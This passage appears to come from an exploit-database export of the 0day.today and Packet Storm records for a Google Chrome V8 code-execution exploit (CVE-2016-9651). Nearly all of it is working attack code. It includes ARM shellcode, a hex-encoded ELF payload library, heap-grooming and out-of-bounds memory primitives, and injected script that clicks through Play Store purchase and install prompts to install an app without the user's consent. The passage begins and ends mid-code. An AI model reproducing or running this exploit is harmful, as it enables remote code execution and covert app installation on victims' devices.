,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];\r\nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000\";\r\nvar arrayBuffer = new ArrayBuffer(0x1000000);\r\nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1;\r\nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4);\r\nvar args_address = backingStoreAddress+1024;\r\nfunction write_shellcode(dlsym_addr,buffer){\r\n //ldr r0,[pc,4]//0xe59f0004 \r\n //ldr r1,[pc,4]//0xe59f1004\r\n //b shellcode;//0xea000001\r\n //dlopen_addr//array_buffer_address\r\n //dlsym_addr\r\n //shellcode\r\n //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];\r\n var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];\r\n for(var i=0;i<stub.length;i++){\r\n globaldv[buffer/4+i]=stub[i];\r\n }\r\n \r\n shellcode = shellcode.concat([0,0,0,0]);\r\n for(var i=0;i<shellcode.length/4>>>0;i++){\r\n // u8arr[i+4*stub.length]=shellcode[i];\r\n globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);\r\n }\r\n return stub.length*4+shellcode.length;\r\n}\r\n \r\nfunction xss_code(){\r\n //alert(navigator.userAgent);\r\n //alert(document.cookie);\r\n var i1=setInterval(function(){\r\n if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){\r\n console.log(\"wait load complete\");\r\n return;\r\n }\r\n clearInterval(i1);\r\n var i2=setInterval(function(){\r\n document.getElementsByClassName(\"price buy id-track-click\")[0].click();\r\n var installButton = document.getElementById(\"purchase-ok-button\");\r\n if(installButton == null)\r\n return;\r\n installButton.click();\r\n document.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\");\r\n clearInterval(i2);\r\n setTimeout(function(){\r\n window.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\");\r\n },26000);\r\n },500);\r\n },500);\r\n}\r\n \r\nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\";\r\n//var backup_arr = backup_original_code(huge_func_code_entry);\r\nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);\r\nvar args_view = new DataView(arrayBuffer,1024,100);\r\nvar so_file_view = new DataView(arrayBuffer,4096);\r\nvar js_view = new DataView(arrayBuffer,0x100000);\r\nargs_view.setUint32(0,dlsym_addr+0xc,true);\r\nargs_view.setUint32(4,dlsym_addr,true);\r\nargs_view.setUint32(8,huge_func_code_entry,true);\r\nargs_view.setUint32(12,writed_len,true);\r\nargs_view.setUint32(16,backingStoreAddress+4096,true);\r\nargs_view.setUint32(20,so_str.length/2,true);\r\nargs_view.setUint32(24,backingStoreAddress+0x100000,true);\r\nargs_view.setUint32(28,js_str.length,true);\r\nprint(\"length is \"+so_str.length);\r\nfor(var i=0;i<so_str.length;i+=2){\r\n var value = so_str.substr(i,2);\r\n value = \"0x\"+value;\r\n so_file_view.setUint8(i/2,parseInt(value));\r\n}\r\nfor(var i=0;i<js_str.length;i++){\r\n js_view.setUint8(i,js_str.charCodeAt(i));\r\n}\r\n \r\nprint(\"begin execute shellcode\");\r\nhuge_func({});\r\n \r\nprint(\"done\");\r\npostMessage(true);\r\n//prevent arrayBuffer to be released\r\nwhile(1){}\r\n \r\n}\r\n//main world\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");\r\n}\r\n \r\n// Build a worker from an anonymous function body\r\nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );\r\n \r\nvar worker;\r\nvar exploitSucc = false;\r\nvar count = 0;\r\nfunction startExploit(){\r\n print(\"worker thread is started\");\r\n worker = new Worker( blobURL );\r\n count++;\r\n worker.onmessage = function(e){\r\n print(\"exploit result is \"+e.data);\r\n exploitSucc = e.data;\r\n if(exploitSucc==false){\r\n startExploit();\r\n return;\r\n }\r\n var end = +new Date();\r\n print(\"time diff is \"+(end-begin)/1000);\r\n //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';\r\n top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';\r\n }\r\n}\r\nvar begin = +new Date();\r\nstartExploit();\r\n \r\nvar savedCount = 0;\r\nvar hangMonitor = setInterval(function (){\r\n if(exploitSucc==true){\r\n clearInterval(hangMonitor);\r\n }else{\r\n if(savedCount==count){//maybe hang\r\n print(\"worker maybe hange\");\r\n worker.terminate();\r\n startExploit();\r\n }else{\r\n print(\"worker is normal\");\r\n savedCount = count;\r\n }\r\n }\r\n},10000);\r\n//URL.revokeObjectURL( blobURL );\r\n \r\n \r\n</script>\r\n</html>\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/27954", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2017-06-15T04:21:23", "description": "", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "packetstorm", "title": "Google Chrome V8 Private Property Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9651"], "modified": "2017-06-14T00:00:00", "id": "PACKETSTORM:142939", "href": "https://packetstormsecurity.com/files/142939/Google-Chrome-V8-Private-Property-Arbitrary-Code-Execution.html", "sourceData": "`<html> \n// Source: https://github.com/secmob/pwnfest2016/ \n<script> \nfunction exploit(){ \n \nfunction to_hex(num){ \nreturn (num>>>0).toString(16); \n} \nfunction intarray_to_double(int_arr){ \nvar uBuf = new Uint32Array(2); \nvar dBuf = new Float64Array(uBuf.buffer); \nuBuf[0]=int_arr[0]; \nuBuf[1]=int_arr[1]; \nreturn dBuf[0]; \n} \n \nfunction str_to_double(str){//leng of str must be 8 \nvar dBuf = new Float64Array(1); \nvar u8Buf = new Uint8Array(dBuf.buffer); \nfor(var i=0;i<str.length;i++){ \nu8Buf[i] = str.charCodeAt(i); \n} \nreturn dBuf[0]; \n} \nfunction double_to_array(value){ \nvar uBuf = new Uint32Array(2); \nvar dBuf = new Float64Array(uBuf.buffer); \ndBuf[0]=value; \nreturn uBuf; \n} \n \nfunction gc(){ \nfor(var i=0;i<0x100000/16;i++){ \nnew String; \n} \n} \nfunction getHiddenValue(){ \nvar obj = {}; \nvar oob = \"/re/\"; \n//oob = oob.replace(\"re\",\"*\".repeat(0x2000)); \noob = oob.replace(\"re\",\"*\".repeat(0x100000)); \nvar str = 'class x extends Array{'+oob+\"}\"; \nvar fun = eval(str); \nObject.assign(obj,fun); \nreturn obj; \n} \nvar obWin; \nfunction makeOobString(){ \nvar hiddenValue = getHiddenValue(); \nvar magicStr = \"bbbb\"; \nvar arr=[]; \nvar str = 'class x extends Array{}'; \nfor(var i=0;i<str.length;i++){ \narr[i]=str.charCodeAt(i); \n} \nvar ob = new Array(0x200); \nob.fill(0x31313131); \ngc(); \ngc(); \nstr=String.fromCharCode.apply(null,arr); \nob=ob.concat(0x32323232); \nvar fun = eval(str); \nob[2]=str; \nob[3]=ob; \nObject.assign(fun,hiddenValue); \nvar oobString = fun.toString(); \ngc(); \ngc(); \nprint(\"begin search\"); \nvar subStr = oobString.substr(0,0x8000); \nvar pos = subStr.indexOf(magicStr); \nprint(\"end search\"); \nif(pos==-1){ \nprint(\"find magic failed\"); \npostMessage(false); \nself.close(); \nprint(\"unpossible\"); \nthrow \"error\"; \n}else{ \nprint(\"find magic at \"+pos); \n \n} \noobString = oobString.substr(pos,ob.length*4); \nobWin=ob; \nreturn oobString; \n} \nvar oobString = makeOobString(); \nprint(\"get oob string successfully\"); \nfunction print(){ \nconsole.log.apply(null,arguments); \n/*document.write('<p >'); \ndocument.write.apply(document,arguments); \ndocument.write(\"<p>\");*/ \n} \nfunction str2arr(str,len){//len must be multile of 4 \nif(len===undefined) \nlen = str.length; \nvar u8a = new Uint8Array(len); \nfor(var i=0;i<len;i++){ \nu8a[i] = str.charCodeAt(i); \n} \nreturn new Uint32Array(u8a.buffer); \n} \nfunction pArrayInHex(arr){ \nvar result=\"<p style='font-size:8px'>\"; \nfor(var i=0;i<arr.length;i++){ \nresult+=(arr[i]+0x100000000).toString(16).substr(-8); \nresult+=\" \"; \nif(i%8==7) \nresult+=\"<p style='font-size:8px'>\"; \n} \nresult+=\"<p>\"; \nprint(result); \n//alert(result); \nreturn result; \n} \nfunction pStrInHex(str){ \n//var result=\"<p style='font-size:8px'>\"; \nvar result=\"\\n\"; \nfor(var i=0;i<str.length;i++){ \nvar code = str.charCodeAt(i); \nresult+=(code+0x100).toString(16).substr(-2); \nif(i%4==3) \nresult+=\" \"; \nif(i%32==31) \n// result+=\"<p style='font-size:8px'>\"; \nresult+=\"\\n\"; \n} \n// result+=\"<p>\"; \nresult+=\"\\n\"; \nprint(result); \nreturn result; \n} \nfunction getObjAddr(obj){ \nobWin[0]=obj; \nvar value2= ((str2arr(oobString,4))[0]); \nreturn value2>>>0; \n} \n \nvar getObj24BitsAddr = function(){ \nvar smi=0; \nvar code = 0; \nvar i=0; \n//don't allocate heap object \nfunction getAddr(obj){ \nobWin[0]=obj; \nvalue=0; \ncode = 0; \ni=0; \nfor(i=2;i>=0;i--){ \ncode = oobString.charCodeAt(i); \nvalue = code+value*256; \n} \nreturn value; \n} \nreturn getAddr; \n}(); \n \n \nvar lengthInOldSpace = 0xfffffffc; \nvar abarr=new Array(800); \nfunction sprayVM(){ \nvar i=0; \nvar j=0; \ntry{ \nfor(i=0;i<20;i++){ \nvar u8 = new Uint8Array(0x10000000-0x500); \nabarr[i]=u8; \n} \n}catch(e){} \ntry{ \nfor(j=0;j<100;j++){ \nvar u8 = new Uint8Array(0x8000000-0x500); \nabarr[i+j]=u8; \n} \n}catch(e){} \nprint(\"allocate \"+i+\" 256M \"+j+\" 16M \") \nfunction getRandomInt(min, max) { \nmin = Math.ceil(min); \nmax = Math.floor(max); \nreturn Math.floor(Math.random() * (max - min)) + min; \n} \ndelete abarr[getRandomInt(0,i)]; \n} \n \n \nfunction getNewSpaceAddrs(){ \n/*var kMaxRegularHeapObjectSize =523776;// 507136; \nvar str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000); \nstr+=\"%\";*/ \nvar objsInNewSpace = new Array(80); \nfor(var i=0;i<objsInNewSpace.length;i++){ \n//var xx=escape(str); \nvar xx = new Array(0x70000/4); \nobjsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0; \n//a1/2?newspaceae'c|>>aePS \nnew Uint8Array(0x100000-0x500); \nnew Uint8Array(0x100000-0x500); \n} \nfunction compareNumbers(a, b) { \nreturn a - b; \n} \nobjsInNewSpace = Array.from(new Set(objsInNewSpace)); \nobjsInNewSpace = objsInNewSpace.sort(compareNumbers); \nreturn objsInNewSpace; \n} \n \n \nprint(\"begin get new space address\"); \nvar objsInNewSpace = getNewSpaceAddrs(); \nwhile(objsInNewSpace.length<16){ \nobjsInNewSpace = getNewSpaceAddrs(); \nprint(\"new space addresses\"); \npArrayInHex(objsInNewSpace); \n} \n \ntry{ \nsprayVM(); \n}catch(e){} \n \nvar selectedTrunk = 0; \nvar selectedStr = \"\"; \nfunction bruteForceFengShui(){ \nvar huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000 \nhuge_str +=\"%\"; \nvar hold = new Array(100); \n//var holdaddress = new Array(100); \nfor(var i=0;;i++){ \nvar large = escape(huge_str); \nvar addr = getObjAddr(large); \n//console.log(addr.toString(16) + \" \"+i); \nif(i<hold.length){ \nhold[i]=large; \n//holdaddress[i]=addr; \n} \naddr=(addr&0xfff00000)>>>0; \naddr = addr-0x100000; \nif(objsInNewSpace.indexOf(addr)!=-1){ \nselectedTrunk = addr; \nselectedStr = large; \nabarr.fill(1); \nhold.fill(1); \n//holdaddress.fill(1); \nbreak; \n} \nif(i===150){ \n/*i=0; \nprint(\"tried 200 times\"); \nabarr.fill(1); \ntry{ \nsprayVM(); \n}catch(e){};*/ \npostMessage(false); \nclose(); \nthrow \"exceed limits\"; \n} \n} \n} \nbruteForceFengShui(); \n//to avoid allocate memory latter, initilize here \nvar nextTrunk = selectedTrunk + 0x100000; \n \n//caea,aeP3a$?a$?SSca-e->>aaa \nvar huge_str = \"eval('');\"; \n//8000a,e1/2a$?aa$?SSi1/4a$?aa$?SSa1/4a1/2?new_spaceaC/a$?SS \nfor(var i=0;i<8000;i++) huge_str += 'a.a;'; \nhuge_str += \"return 10;\"; \nvar huge_func = new Function('a',huge_str); \nhuge_func({}); \n \nfunction fillNewSpace(origObj){ \n//first object in new space at 0x8100, new spaces layout \n//0x40000 \n//0x37f00 \n//..... \n//0x40000 \nvar gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25 \nvar gap = gap+\"%\"; \n//flat gap \ngap.substr(0,100); \nvar fillstr = \"%20a\".repeat((0x40000-12)/4); \nfillstr = escape(fillstr); \nvar addr=0; \nfor(var i=0;i<0x100;i++){ \naddr = getObj24BitsAddr(origObj); \nif((addr&0xfffff)===0x8101) \norigObj=escape(gap); \nelse \norigObj=unescape(fillstr); \n} \n} \n \nfunction findNewSpace(){ \nvar kMaxRegularHeapObjectSize =523776;// 507136; \nvar str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000); \nstr+=\"%\"; \nfor(var i=0;;i++){ \nvar xx=escape(str); \nvar straddr = getObjAddr(xx); \naddr=(straddr&0xfff00000)>>>0; \nif(addr===selectedTrunk){ \nprint(\"good state \"+straddr.toString(16)); \nbreak; \n} \n} \n} \n \nfunction myencode(str){ \nvar arr = []; \nfor(var i=0;i<str.length;i++){ \nif(i%2==1) \narr.push(str.charCodeAt(i)); \nelse{ \narr.push(37);//% \nvar hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2); \narr.push(hexstr.charCodeAt(0)); \narr.push(hexstr.charCodeAt(1)); \n} \n} \nreturn String.fromCharCode.apply(null,arr); \n} \n \nvar dArray = []; \nvar index = (0x8100-36)*2; \nfor(var i=0;i<0x20000/8;i++){ 